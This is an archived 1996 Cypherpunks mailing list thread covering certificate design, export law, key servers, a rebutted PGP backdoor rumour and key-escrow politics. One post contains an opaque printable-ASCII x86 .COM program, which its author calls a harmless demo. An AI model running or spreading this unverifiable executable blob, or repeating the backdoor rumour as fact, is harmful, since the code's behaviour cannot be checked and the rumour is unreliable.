>of certificates or keys.  The cert is more general than X.509 -- that is,
>it includes all of X.509 and then some [because we don't require some
>binding to a human identity, don't require a Certificate Authority, ...].
>Our first format is RFC822-like -- so it's easy to parse and generate and
>read and use.  It's very rich and flexible.  We're working to make it
>an IETF standard.  It does not use ASN.1 and has none of the baroqueness
>of X.509.
>
>In fact, these certs can be formed as PGP clear-signed messages.

Isn't using a hash as the identifier replicating the key distribution
problem that PGP has or are you including some other data that can be used
to look up the cert?  I think a problem occurs when you have 20 billion of
these certs (two for every person in the year 2010 or such).  A simple hash
into a table isn't going to cut it because you a single database (with
replication?) isn't going to be possible.  Some hierarchical lookup like
DNS is going to be needed. The look ups are needed to check for revocation.

LL






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 29 Feb 1996 22:56:02 +0800
To: Mark Bainter <cypherpunks@toad.com
Subject: Re: PGP backdoor?  (No, I'm not paranoid.)
Message-ID: <2.2.32.19960229142232.0072d064@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:22 PM 2/28/96 -0800, Mark Bainter wrote:

>personally thought they were being paranoid.  However, this guy tells me 
>that he met Phil at defcon and phil told him that he co-operated with 
>the government and gave them information that would enable them to crack 
>key's for versions later than 2.3.   

Since Phil didn't personally write 2.3 *or* versions later than 2.3, he
couldn't have conspired with the Feds.  In addition, source code makes back
doors difficult.

DCF


I don't know whether to believe him 
>or not, as I said earlier he is not a long-time friend or anything, so he 
>could just be lying to me.  If anyone has any information on this I would 
>appreciate it.
>
>---
>"Man did not enter into society to become 
> worse than he was before, nor to have 
> fewer rights than he had before, but
> to have those rights better secured." 
>             --- Thomas Paine 1791
>
>>>My key is on the keyservers.
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 1 Mar 1996 07:41:43 +0800
To: Kevin.L.Prigge-2@tc.umn.edu (Kevin L Prigge)
Subject: Re: Site certificates?
In-Reply-To: <3135b1416a2d002@noc.cis.umn.edu>
Message-ID: <199602291430.JAA07872@homeport.org>
MIME-Version: 1.0
Content-Type: text


GTE has announced, `Cybertrust` but I don't know if its operational or
not.  MCI Mall and AT&T also offer certificates.

The unfortunate fact is that at the moment, getting a certificate from
someone Netscape has decided to trust makes your customers life much
easier, because they never have to decide to trust your key.  Thus,
Verisign, MCI mall and AT&T have a large commercial advantage waiting
for Netscape to tell the world what criteria they use for selecting
KCA to trust.

Adam


Kevin L Prigge wrote:

| David K. Merriman said:
| >
| > Can someone point me in the direction of who I need to talk to in
| order to get security certificates for a Web server I'm setting up? I
| sent email to MS and Netscape, and neither has deigned to respond in 4
| days....     
| >
| > Thanks
| >
| > Dave Merriman
| 
| VeriSign does that. http://www.verisign.com/
| (They're slow, though)
| 
| --
| Kevin L. Prigge         | "You can always spot a well informed man -
| University of Minnesota |  his views are the same as yours."
| email: klp@tc.umn.edu   |  - Ilka Chase
| PGP Key Fingerprint =  FC E5 EE E7 8B 2E E9 D5  DA 1C 5D 6B 98 52 F6 24
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Fri, 1 Mar 1996 05:49:16 +0800
To: lmccarth@cs.umass.edu
Subject: Re: PGP to PC mail integration
Message-ID: <2.2.32.19960229085326.003358ec@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 08:54 1996-02-28 -0500, lmccarth@cs.umass.edu wrote:
>Mike Ingle writes:
>> Instead of messing with user interfaces, 
>
>I wrote:
># Would you be stuck if you wanted to send something unsigned and/or 
># unencrypted ?
>
>Matts writes:
>% Nope. The VB program should give a popup window where you can enter your
>% passphrase to sign/decrypt the message. Such a popup can have a <NO> button
>% if you don't want it to do its thing.
>
>Sure sounds like a user interface to me. <shrug>

Sure, what did you expect? A program that obtains your pass phrase without a
user interface?!? That would be a neat hack if you could pull it off. Should
it do mind reading, or just crack the pass phrase by brute force?

Seriously, the idea here is that the pgp front end shouldn't deal with the
user interface in your present mail program. Nobody (before you) have
considered doing it completely without a user interface.

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael A. Atzet" <atzet@vnet.ibm.com>
Date: Sat, 2 Mar 1996 15:34:58 +0800
To: jsw@netscape.com
Subject: Re: X.509 certs that don't guarantee identity
In-Reply-To: <199602260448.WAA01201@proust.suba.com>
Message-ID: <3135CC13.41C6@vnet.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein wrote:
> 
> Alex Strasheim wrote:
> >
> > On the 23rd, Jeff Weinstein said this concerning the natural
> > semi-anonymity of the net:
> >
> > > Given that verisign and others will soon begin issuing large numbers of
> > > certificates that do not guarantee the identity of the key holder, it seems
> > > that this tradition will continue even with the wide deployment of X509
> > > certs.
> >
> > This has been bugging me since I read it.  I'm not sure I understand the
> > plan;  it only makes sense to me if "anonymous" X.509 certs are issued
> > for user authentication only, not for server authentication.  Is that
> > what this is about?
> >
> > (If anonymous certs are issued for servers, why should such a cert be
> > treated any differently than one I generate on my own, which causes
> > warning screens about an unknown CA to pop up?)
> 
>   The navigator will not be configured to automatically trust the verisign
> level 1 and 2 certificates for SSL servers.  You will get the same warning
> dialog with these certs as you do with one you generate on your own.
> 
>         --Jeff
> 
> --
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.

How will Navigator differentiate between the different level certs? I am not
aware of any fields in the cert itself that designate what level it is.
I know that the subject info would "look" different for a persons name vs.
email address vs commom name.

--
Michael A. Atzet         IBM AIX Systems Center         Roanoke, Texas
***  All opinions above are mine and not necessarily that of IBM.  ***
                           atzet@vnet.ibm.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Fri, 1 Mar 1996 00:33:13 +0800
To: <cypherpunks@toad.com>
Subject: Problems with key server
Message-ID: <9602291505.AC12449@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


  Has anyone recently had problems trying to upload their public key to
BAL's PGP Public Key Server?
  I had no problem connecting to BAL's site.  However, I tried several times
to submit my public key and kept receiving "server down, try later, etc."
message.

Regards -
Lynne


**********************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
**********************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 1 Mar 1996 05:44:33 +0800
To: cypherpunks@toad.com
Subject: Information...  We need Information...
Message-ID: <2.2.32.19960229183232.008bb900@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I am working on a project to demonstrate the insecurities in a
specific cryptosystem.  I am working with the author to show
him the insecurities of his product.  (I believe them to be
many.) [There are a number of problems so far that will doom
it...  The name is derivative of a trademarked product.
Initial disassembly shows there are no common crypto algorithms
being used.  The algorithm is secret.  There is no key
management to speak of.  It only works on text files. And so
on... Why am I still working on this? Because the author has
created some good products and I do not want to see him be
ripped to shreds when he releases this.]

It is also a good excuse to do research on a couple of topics.

Here is the problem...  I am looking for texts on the breaking
of cyphers.  (I want to show him WHY the cypher is insecure and
not just say "<scottish accent>It's crap!</Scottish accent>".)
I have done a couple of searches and have come up fairly dry.

The Cyphernomicon has a couple of paragraphs, but nothing on
techniques or pointers to other references.  RSA's FAQ has
little to nothing as well. A web search turned up little
useful. Most of the other references I have found have been for
current cyphers, but next to nothing about breaking them. 

I have been recommended "The Codebreakers" by Kahn.  (I will be
picking that up as soon as I can find a copy.)  I have "Applied
Cryptography".  (It is not oriented towards the breaking of
cyphers, but it has some good remarks on the weaknesses of
those listed.) Are there others?  I would prefer electronic
references, but hardcopy text is useful as well.  Most of what
I have found in the crypto field for books has been remarkably
bad (with a few notable exceptions). (It is hard to respect a
book when the code is written in BASIC...)

In this case, brute force might work, but I am looking for
something a bit more elegant.

I am getting more details on the code today.  It should be
interesting.

Any pointers to references are appreciated.

Thanks in advance!



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMTXwTOQCP3v30CeZAQGmWgf+LyJFcbTmE1hviLLLGJp+usFYOdEt2H4X
0/8PzHoOOy6MW4hc/om2npwFiDhSG3vPvmF3UMHX/BHvNChQ53+rvHDsynxTh+Wo
F/t9qkXxKMNS41AAHMmdTgNYaO7h2Osjk6f514xX9ac0ZzSSbQmWkrwuYzopO0W/
lytSxjh3Vu6IfhWIClf/CTrotIgeUp/zhdfLlV69Nu1ZVnZWrkNh1j+8+H4mg5mv
wPmq9UkA5AnIS37yJ3ywm8Z/FNHNxL8A8oA9OWJH9z/e5knQpkgsVQfWDpT3dMF1
+AwoJc6cKr91U3KRmayi2SuNmctRaacoCUIQJ1Se412m8KGzUnhaLw==
=SiB0
-----END PGP SIGNATURE-----
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 1 Mar 1996 06:05:10 +0800
To: Alan Olsen <cypherpunks@toad.com
Subject: Re: Information...  We need Information...
Message-ID: <199602291855.KAA17614@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 AM 2/29/96 -0800, Alan Olsen wrote:
>Here is the problem...  I am looking for texts on the breaking
>of cyphers.  (I want to show him WHY the cypher is insecure and
>not just say "<scottish accent>It's crap!</Scottish accent>".)
>I have done a couple of searches and have come up fairly dry.

Some of Friedman's instruction manuals from the (pre?)WW2 days have been
declassified.  When I was down at Computer Literacy Bookshops
(408/435-1118) in San Jose, they had 5 or 6 titles on codebreaking. 
Applied Cryptography talks about some more modern attacks, such as meet in
the middle.  Starting from the references and going to a good technical
library might produce some information.

Good Luck - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Fri, 1 Mar 1996 03:18:21 +0800
To: cypherpunks@toad.com
Subject: Copyrighted code and executable ASCII
Message-ID: <960229113215.20230778@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Since several have asked and it serves several points, I present
the following (also am interested in coderpunks - does this
constitute a qualification ?).

Point the first. A couple of years ago questions arose concerning
executable ASCII. I had played with the concept back around the time
I was doing memory maps of Bendix 930s and Mil-Std-1750s but never went
very far with it. The concept was ressurected c.a. 1988 with a concern
about multi-platform viruses (not talking macros or portable source,
but true multi-platform binaries - can to the conclusion that dual
platform was doable, triple possible but very difficult, and four
bl**dy unlikely.

Around 1990 some people in Germany developed a program (sorry, I do
not recall the citation but wanted to acknowlege the fact - believe 
the program is on SimTel mirrors). That program was buggy and not
suitable for E-mail through certain gateways and recipients.

In 1994, there was a flurry of concern about E-Mail vulnerability
and the subject came up again. We have had "ASCIIrizers" for some time:
TekHex was one of the first I was aware of, then UUencode, PGP "Ascii
Armor", and others. All required an client side file for decoding or
the even cruder DEBUG scripting mechanisms. Looking at an Intel CPU
instruction map, it became apparent that there was an entire class
of instructions contained wholly within the RFC-822 compliant area.

The result was my 1994 "Christmas Card". Since then I improved the
algorithm somewhat reducing the first 129 character line to 64 characters
(not sure why that was a target other than the max & min terms said
yes and that is what UUencode uses so is known to work).

This brings up the second point. Rewriting Copyrighted algorithms as
is being discussed in relation to Royal Crown Cola (tm). Was once told 
that one test was that at least 20% of the code must be different.

Now when using a compiler this is difficult to demonstrate because the 
included libraries make up much of the code. Assembly programming is
different. Sometimes things must be done in a particular order to work
at all. The enclosed code is an example: the bulk of the program is 
trivial, compression is lousy but that was not the intent. The key 
is in the first lime of code that makes it all possible, operable on
everything from an 8088 to a 486 (do not know about Pentium - do not 
have one, nor a power PC but no one who received last year's card
complained).

It may be possible to change some of the registers and possibly
some of the order but the stack is the stack. So here is a question:
can that first line be changed sufficiently to satisfy the "independantly
developed" tests whatever they may be. No credit for lengthening the
line. Kudos for shortening but would be surprised if more than a 
couple of bytes could be removed while maintaining the functionality
(some things were done to maintain compatability with the different
pipeline mechanisms used by Intel and at least one kludge was 
necessary to avoid a bug in the Intel microcode).

For those who would like the source code: sorry, it does not exist,
all programming of the first line was done using DEBUG. There is
an .ASM of the whole file but it contains a long "DB" directive.

I have signed the code for authenticity. The executable file must 
start with the first "X" as the first byte (could have put logo 
in front. Didn't.). All the "P"s were deliberate.

Will only work with true .COM files up to about 30k. Does not need to 
be so limited, just is & has nothing to do with the first line, just
is a PoP & I was lazy 8*).

Coderpunks are also welcome to comment.

					Warmly,
						Padgett

ps have launched .COM directly from ccMail attachment before.

-----BEGIN PGP SIGNED MESSAGE-----

XP[@PPD]5`P(f#(f((f?5!QP^P_u!2$=po}l=!!rZF*$*$ =0%GF%!!%PP$P$Ps-
$l%gmZ$rl6lW$rm6mWlVl6m=ldmAlv%fmvmB%Xm6lW%Xm6mWl6m6m=ld%ylVmqlJ
mqlRmqlNmqlBlWl6m6l/m'l/m3mql8mrm4mql:mAm1mBlal6m0l1%f%r%r%rl&$W
%z${$z%yl"%qm"l&$a%Vl&$j%b$`%_%`$X$X$|l&%z%v%v$xl1m0l&%q%[$[$W%`
$Y$X%Yl&%bl&${%q%k%ll&$_%^$\%`l&$X%[l&%b$[l&%r%i%q%n%nl&%`$V%`%a
%X$X%b$a$\%`l&%Y$X$Y%^$[%_l&l1m0l&%n$[$W%[%a%b$X%^%[$[$ul&%f%r%r
%rl&$t$_%^$\%`$[%b%\%`$sl&l1m0l&%k$Y%^%_%^$[%b$\l&$_%^$\%`l&%W%^
$\$\l&$a%`l&$Y%`$[%b%\%`$`l&${%k$i%ol&l)l$m0l1l$l6l$l6l6l6l6l6l6
$rm6lWlvl6l#lql0lvm:l6%Xl0lYm5m6l\m2mPm&lZl6$lmPm&$omql+mem6$ym7
lqmJm5lGl#mrm+lql4$tl&%Xm4$ol7mRmAm<$ym@mqlK%jmql7l^${l=l_mqm;m`
m$%c%c%t%q%k%Xm3l`l$%c$t%l$Xm#lYm7m6mAlX$o%^$\%`l&$`%[%`%Yl&$[%[
$Xl&$^%b$W%`l&${%q%k%ll&%`$V$X%`$[%Y%^%[$[l$%fmumBl4mql=mr$wmpl5
mWmPl4m!m:mr$smrl5%gm=ld%cl\$gmPm&%Y%YlY$ol5l^m5mB%Xm7%q%[%X$\$`
l&$[%[$Xl&$Y%`$[%b%\%`l&${%q%k%ll&$_%^$\%`l&$X%[l&${%k$i%o${l$lY
$Yl5l^l3mB%nm7%q%[%X$\$`l&$[%[$Xl&%[$Z%`$[l&$_%^$\%`${l$l6l6l6l6
l6l6l6l6l&%q%[$[$W%`$Y%Y%^%[$[l&$Z$Y%[%a%`%Y%Yl&%a%[%\%\%`$[%a%^
$[%_${${${l$lZl6$tmPm&$Yl]memql5mqmKlZl6%tmPm&$Ylcmemsl5lYmol5l\
m2mPm&mZ$ql6lYlLl4lBlsm6%ym@mZ%xl6lBlOl6mNmFlB$Wm6lZl6%smql'msl5
mZl6l5lYl*m4mPm&%Ym&lYm8l5l^m4mBlWl7l&$q%b$`l&$_%^$\%`l&$Y%`%b$`
l&$Y%`$Z%[$Y$X%`$`l&l$mqlRmul:l6$Sm5mBmvl6mZl5l6lYlMl4lB$xm6mZ$q
l6lY$xm5lBm!m6mA$qm0l1%c%c%c%c%f%r%r%r%c%a%[$Z%V$Y%^%_$^$X%cl"%q
m"%c%z%v%v$x%c$a%V%c$j%b$`%_%`$X$X$|%c%b$\$\%c$Y%^%_$^$X%Y%c$Y%`
%Y%`$Y$W%`$`%c%c%c%c%clBm+l6l\m2lYmum5l^l6mB$vl7${${${%a%[%\$Z$\
%`$X%`${l$l\$smql'msl5mPm&l\$smql'mql5mPm&mUlBm2l6mNmFlBm^l6mB$v
m7mU%jlWl*m4mWl*m3%ylV%ymIl`lbm6$Xl5l7mUlvmQl$$tl^%Wl4$t$|%Tm5lv
mQ$nl!mUl;lJlNlBlqmElslFma%pmum8l&$Tm2%ym@mf$xm5ma$f$r$jlEmQ%fmf
mam6m5mVm5mV$Yl4memam6mUlBlkm7lZl6%rmql+mpl5mPm&%Ym)lYm0l4l^l2mB
l_m8%i%^$U%`%{$p%`$\%`$X%`l&%`$Y$Y%[$Y${l$lZl6$gmql+mrl5mq$smpl5
mPm&lY%xl4l^m2mBlsm8%k$Y%^%_%^$[%b$\l&${%q%k%ll&$_%^$\%`l&$X%[%[
l&$a%^%_$|l&%`$V%^$X%^$[%_${l$lYl*m3lZl6$rmql'mql5mPm&$Ym6mUlY%Z
l4l^m3mB$mm8%p$Y$Y%[$Yl&%W$Y%^$X%^$[%_l&$X%[l&${%q%k%ll&$_%^$\%`
${l$l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6
l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6l6
l6l6${%[$Y%_l6$Z$Z$f$j%e$r$j$j$p%d%x$b$jl"$_m%l"$_l"l"$_%s%xm&%j
$j$c$j%c%Xm&$yl$%t$Z%[%T$\%tm&m&$Y$e$ol!l$l!l$l&%t$zm$%o$om$m&m&
m$$j$jl$$jl$$j%Y%|m0l1$Z$Z$l%gmZ$rl6lW$rm6mWlVl6m=ldmAlv%fmvmB%X
m6lW%Xm6mWl6m6m=ld%ylVmqlJmqlRmqlNmqlBlWl6m6l/m'l/m3mql8mrm4mql:
mAm1l6l6l6pp
____YAAA_copyright_(C)_1994_by_Padgett,_all_rights_reserved_____
-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAwUBMTXclIVuK+48ORdVAQHq4QP/TgAirDLN2dONcfdmfPK02mjTHF2jg4zY
nFqWZ9CuirrD+THVszeDbHjwmyBAgZVnnesDwVIDaNc4kdySVrPVwtX5xgA1sjXE
oKrJxP5+YRTL5M0dbQUmbWLsEK9g2IToAqWIODVLHOI8K5l99/CQz8J+71zWzu9e
VaQP4Mppdy4=
=C3xl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Fri, 1 Mar 1996 08:03:17 +0800
To: cypherpunks@toad.com
Subject: Re: X.509 certs that don't guarantee identity
In-Reply-To: <199602260448.WAA01201@proust.suba.com>
Message-ID: <31360533.1CFB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael A. Atzet wrote:
> Jeff Weinstein wrote:
> >
> >   The navigator will not be configured to automatically trust the
> > verisign level 1 and 2 certificates for SSL servers.  You will get
> > the same warning dialog with these certs as you do with one you
> > generate on your own.
> >
> How will Navigator differentiate between the different level certs? I
> am not aware of any fields in the cert itself that designate what
> level it is.  I know that the subject info would "look" different for
> a persons name vs. email address vs commom name.

The different levels of certificate are signed by different CA certs.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 1 Mar 1996 03:55:19 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: S/MIME outside the US?
In-Reply-To: <199602290845.AAA03948@ix4.ix.netcom.com>
Message-ID: <199602291702.MAA14014@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:
# All things are exportable as long as the keysize is kept under a 
# certain size, which is too small to be really secure.  

Bill Stewart writes:
> That's not correct - you can only export crypto code from the US
> for which you have Permission, 

Well, sure. I can only say so many obvious things in one message :}

> and they'll only give you Permission
> if it's weak crypto or you agree to be Well-Behaved (e.g. US banks 
> can export real DES for talking to other banks, but US banks can be
> subpoenaed and forced to hand over the plaintext.)

You didn't quote my next sentence, which was (according to
http://www.hks.net/cpunks/cpunks-24/1417.html)

# (Unless they're used for banking, or only 
# for authentication, or you're only taking it with you for personal use on
# a trip, or....)

-Lewis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Fri, 1 Mar 1996 04:19:11 +0800
To: lharrison@mhv.net
Subject: Re: Problems with key server
In-Reply-To: <9602291505.AC12449@mhv.net>
Message-ID: <9602291721.AA04371@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   X-Sender: lharrison@pop.mhv.net
   X-Mailer: Windows Eudora Light Version 1.5.2
   Mime-Version: 1.0
   Content-Type: text/plain; charset="us-ascii"
   Date: Thu, 29 Feb 1996 10:07:03 -0500
   From: "Lynne L. Harrison" <lharrison@mhv.net>
   Content-Length: 583
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

     Has anyone recently had problems trying to upload their public key to
   BAL's PGP Public Key Server?
     I had no problem connecting to BAL's site.  However, I tried several times
   to submit my public key and kept receiving "server down, try later, etc."
   message.

The machine the keyserver runs on was having problems yesterday, which
caused the keyserver to get behind on e-mail requests and also shut down
the "beta" keyserver.  Things are back to normal now.

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 1 Mar 1996 04:24:07 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PGP to PC mail integration
In-Reply-To: <2.2.32.19960229085326.003358ec@mail.pi.se>
Message-ID: <199602291727.MAA15484@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Matts-

Please don't send me extra copies of mail sent to cypherpunks. I put
that Reply-To: header in there very deliberately.

Matts writes:
> Nope. The VB program should give a popup window where you can enter your
> passphrase to sign/decrypt the message. 

I wrote:
# Sure sounds like a user interface to me. <shrug>

Matts writes:
> Sure, what did you expect? A program that obtains your pass phrase without a
> user interface?!? 

No, a program that doesn't obtain your passphrase at all.

Go back and read what Mike Ingle wrote 
(http://www.hks.net/cpunks/cpunks-24/1540.html)

He said "Instead of messing with user interfaces", and talked about a program
that "encrypts any mail it has a PGP key for the recipient of". That
sounds a hell of a lot like a program with no user interface to me. 
Furthermore, in my sheltered life, I don't know of any mail proxies that
have user interfaces. Mike has given absolutely no indication that the
program he proposes makes any attempt to base its decisions on user input,
including passphrases. Hence my original question.

I'm very happy for you if you have in mind a program that does something
different. But I don't see how it's relevant to whatever questions I
might ask about the program Mike Ingle has in mind.

-Lewis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 1 Mar 1996 15:25:27 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: PARTY PICTURES!
Message-ID: <Pine.SUN.3.91.960229120950.20892A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

At long last pictures from my costume party are available on the
Web.  The URL is:

		http://www.c2.org/party/masquerade/

Special thanks are in order to Sameer for donating the Web page
and loading it up with all the pictures.  See Sameer for all
your Internet privacy needs.

Bart Nagel spent several hours scanning, cropping, digitally 
editing and sweetening the original pictures I took.  Bart (and
I) want you to contact him for all your *expensive* image editing 
needs.  He can be reached at egon@aol.com or barticus@well.com.

Thanks to Gracie and Zarkov for the use of their lovely homes.

And a big thank you to all the attendees who made the party a
might to remember.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pat Farrell <pfarrell@isse.gmu.edu>
Date: Fri, 1 Mar 1996 06:31:56 +0800
To: cypherpunks@toad.com
Subject: DC area physical Cypherpunks meeting this Saturday
Message-ID: <199602291911.OAA19464@isse.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Starting at 3:00 PM, at Digex, as usual.
Details on the Dccp homepage, http://www.isse.gmu.edu/~pfarrell/dccp/
(129.174.40.15 if the DNS is grumpy)

Pat
Pat Farrell      grad student        http://www.isse.gmu.edu/~pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via WWW or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@cybercash.com (Carl Ellison)
Date: Fri, 1 Mar 1996 06:20:00 +0800
To: Laurence Lundblade <lgl@qualcomm.com>
Subject: Re: A brief comparison of email encryption protocols
Message-ID: <v02140b16ad5baae32dfc@[204.254.34.231]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 2/29/96, Laurence Lundblade wrote:

>
>Isn't using a hash as the identifier replicating the key distribution
>problem that PGP has or are you including some other data that can be used
>to look up the cert?  I think a problem occurs when you have 20 billion of
>these certs (two for every person in the year 2010 or such).  A simple hash
>into a table isn't going to cut it because you a single database (with
>replication?) isn't going to be possible.  Some hierarchical lookup like
>DNS is going to be needed. The look ups are needed to check for revocation.

Our current straw-man http://www.clark.net/pub/cme/html/cert.html
uses the following to identify a key within a certificate:

KEY_ID ::=  <hash of public key>
           [<nickname chosen by the owner>]
           [<URL of the full key>]

It is assumed that the key is in a cache at the verifier.  The verifier can
add it to his cache by having it sent to him directly, by fetching it
via the URL (if present), or through some other means.

One of my co-workers [Donald Eastlake] is proposing distribution of keys
via the DNS and that sounds fine, too.

We weren't tying the distribution problem to the certificate problem.
They really are separate.



Revocation is a separate problem.  My personal preference [quite seriously]
is not to allow for revocation -- rather to issue certificates with a
validity only long enough to get the job done but not so long that you'd
be seriously damaged by having an invalid cert honored.  There's no way to
get 100%, immediate validation [by non-existence on a revocation list].
For more words on this subject, see cert.html.

If one really needs CRL checking, I'd recommend including a URL for the
Issuer's own revocation list as a field in the cert.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison          cme@cybercash.com   http://www.clark.net/pub/cme |
|CyberCash, Inc., Suite 430                   http://www.cybercash.com/    |
|2100 Reston Parkway           PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
|Reston, VA 22091      Tel: (703) 620-4200                                 |
+--------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@cybercash.com (Carl Ellison)
Date: Fri, 1 Mar 1996 06:40:30 +0800
To: Laurence Lundblade <lgl@qualcomm.com>
Subject: Re: A brief comparison of email encryption protocols
Message-ID: <v02140b17ad5bacd3a265@[204.254.34.231]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 2/29/96, Laurence Lundblade wrote:
>I think a problem occurs when you have 20 billion of
>these certs (two for every person in the year 2010 or such).  A simple hash
>into a table isn't going to cut it because you a single database (with
>replication?) isn't going to be possible.

BTW, at the rate that memory gets cheaper and smaller, it might be quite
reasonable to have that single database fit alongside your daily appointments
in your shirt-pocket daily organizer and e-mail terminal, in 2010.


+--------------------------------------------------------------------------+
|Carl M. Ellison          cme@cybercash.com   http://www.clark.net/pub/cme |
|CyberCash, Inc., Suite 430                   http://www.cybercash.com/    |
|2100 Reston Parkway           PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
|Reston, VA 22091      Tel: (703) 620-4200                                 |
+--------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@vegas.gateway.com (Anonymous Remail Service)
Date: Fri, 1 Mar 1996 07:24:16 +0800
To: cypherpunks@toad.com
Subject: Jim clark spoke last November in favor of GAK
Message-ID: <199602291953.OAA05959@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


   Here are Jim Clark's comments in favor of GAK. It should be
emphasized that since then, Netscape has officially clarified its
position against GAK, and that the actions of the company speak loudly
of their support of strong crypto. Nonetheless, these comments were
made for the record, so let the record show:

...

[Segue from a brief explanation of public key cryptography and
certification authorities]

So, this is a sophisticated enough system, but you run into a problem.
I mean, it all works perfectly. Assuming there's no compromises in the
the basic... Assuming there's no holes in the operating system, or no
other ways of getting into the computer that's doing all this stuff,
then you've got a system that's bulletproof. That's the problem. The
government doesn't want it to be bulletproof. And the reason they
don't is they want to be able to get access in cases of where there's
national security issues or such, they want to be able to get access
to your private communications.

But you can break that into two parts. There's one area that they
don't care about. And that area is if you cannot possibly send an
encrypted message to someone... Let's take as an example, you're doing
a financial transaction. If that transaction can only... If that
communication can only be used to do a financial transaction, such as
move money from A to B, or doing a wire transfer of funds, the
government doesn't care about that. Uh, maybe they do, but the point
is that's not the kind of communication where you're going to possibly
say I'm going to blow up the World Trade Center, or some such thing.
That's where they're worried.

But this whole process leads to a set of questions about how you
protect this data encryption technology - how you make it usable in a
way that the government finds acceptable, and that you as the
individual or you as the corporation find acceptable. And I've been
thinking about this a lot. It's clear that this notion of issuing
someone a bulletproof key, that is, that create their own private key
where they can do any arbitrary communications via email to anywhere
in the world with no restrictions and no one can possibly eavesdrop.
